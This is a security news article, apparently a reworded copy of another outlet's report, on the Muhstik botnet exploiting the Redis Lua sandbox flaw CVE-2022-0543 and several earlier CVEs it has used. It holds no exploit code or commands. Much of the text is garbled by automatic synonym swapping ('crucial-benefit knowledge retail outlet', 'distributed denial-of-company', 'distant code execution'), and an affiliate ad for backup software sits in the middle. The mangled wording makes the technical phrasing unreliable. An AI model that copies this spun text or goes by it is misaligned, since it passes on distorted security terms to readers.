• Menu
  • Skip to main content
  • Skip to primary sidebar

The Cyber Security News

Latest Cyber Security News

Header Right

  • Latest News
  • Vulnerabilities
  • Cloud Services
muhstik botnet targeting redis servers using recently disclosed vulnerability

Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability

You are here: Home / General Cyber Security News / Muhstik Botnet Targeting Redis Servers Using Recently Disclosed Vulnerability
March 28, 2022

Muhstik, a botnet infamous for propagating via web application exploits, has been noticed targeting Redis servers utilizing a lately disclosed vulnerability in the databases method.

The vulnerability relates to CVE-2022-0543, a Lua sandbox escape flaw in the open-supply, in-memory, crucial-benefit knowledge retail outlet that could be abused to accomplish distant code execution on the underlying device. The vulnerability is rated 10 out of 10 for severity.

“Because of to a packaging issue, a distant attacker with the capacity to execute arbitrary Lua scripts could perhaps escape the Lua sandbox and execute arbitrary code on the host,” Ubuntu pointed out in an advisory introduced past month.

✔ Approved From Our Partners
AOMEI Backupper Lifetime

Protect and backup your data using AOMEI Backupper. AOMEI Backupper takes secure and encrypted backups from your Windows, hard drives or partitions. With AOMEI Backupper you will never be worried about loosing your data anymore.

Get AOMEI Backupper with 72% discount from an authorized distrinutor of AOMEI: SerialCart® (Limited Offer).

➤ Activate Your Coupon Code


In accordance to telemetry details collected by Juniper Threat Labs, the attacks leveraging the new flaw are mentioned to have commenced on March 11, 2022, leading to the retrieval of a destructive shell script (“russia.sh”) from a distant server, which is then utilized to fetch and execute the botnet binaries from a further server.

Automatic GitHub Backups

Very first documented by Chinese security firm Netlab 360, Muhstik is acknowledged to be energetic since March 2018 and is monetized for carrying out coin mining actions and staging distributed denial-of-company (DDoS) attacks.

Capable of self-propagating on Linux and IoT products like GPON house router, DD-WRT router, and Tomato routers, Muhstik has been noticed weaponizing a number of flaws more than the yrs –

  • CVE-2017-10271 (CVSS score: 7.5) – An input validation vulnerability in the Oracle WebLogic Server part of Oracle Fusion Middleware
  • CVE-2018-7600 (CVSS score: 9.8) – Drupal remote code execution vulnerability
  • CVE-2019-2725 (CVSS rating: 9.8) – Oracle WebLogic Server distant code execution vulnerability
  • CVE-2021-26084 (CVSS score: 9.8) – An OGNL (Item-Graph Navigation Language) injection flaw in Atlassian Confluence, and
  • CVE-2021-44228 (CVSS score: 10.) – Apache Log4j distant code execution vulnerability (aka Log4Shell)

“This bot connects to an IRC server to receive instructions which incorporate the following: obtain documents, shell instructions, flood attacks, [and] SSH brute force,” Juniper Threat Labs researchers said in a report revealed very last week.

In gentle of energetic exploitation of the critical security flaw, consumers are really proposed to move promptly to patch their Redis services to the latest model.

Identified this posting exciting? Follow THN on Fb, Twitter  and LinkedIn to read much more unique content we put up.


Some sections of this report are sourced from:
thehackernews.com

Previous Post: «fcc adds kaspersky and chinese telecom firms to national security FCC Adds Kaspersky and Chinese Telecom Firms to National Security Threat List
Next Post: One in 10 UK Staff Circumvent Corporate Security Cyber Security News»

Reader Interactions

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Report This Article

Recent Posts

  • Over 269,000 Websites Infected with JSFireTruck JavaScript Malware in One Month
  • Ransomware Gangs Exploit Unpatched SimpleHelp Flaws to Target Victims with Double Extortion
  • CTEM is the New SOC: Shifting from Monitoring Alerts to Measuring Risk
  • Apple Zero-Click Flaw in Messages Exploited to Spy on Journalists Using Paragon Spyware
  • WordPress Sites Turned Weapon: How VexTrio and Affiliates Run a Global Scam Network
  • New TokenBreak Attack Bypasses AI Moderation with Single-Character Text Changes
  • AI Agents Run on Secret Accounts — Learn How to Secure Them in This Webinar
  • Zero-Click AI Vulnerability Exposes Microsoft 365 Copilot Data Without User Interaction
  • Non-Human Identities: How to Address the Expanding Security Risk
  • ConnectWise to Rotate ScreenConnect Code Signing Certificates Due to Security Risks

Copyright © TheCyberSecurity.News, All Rights Reserved.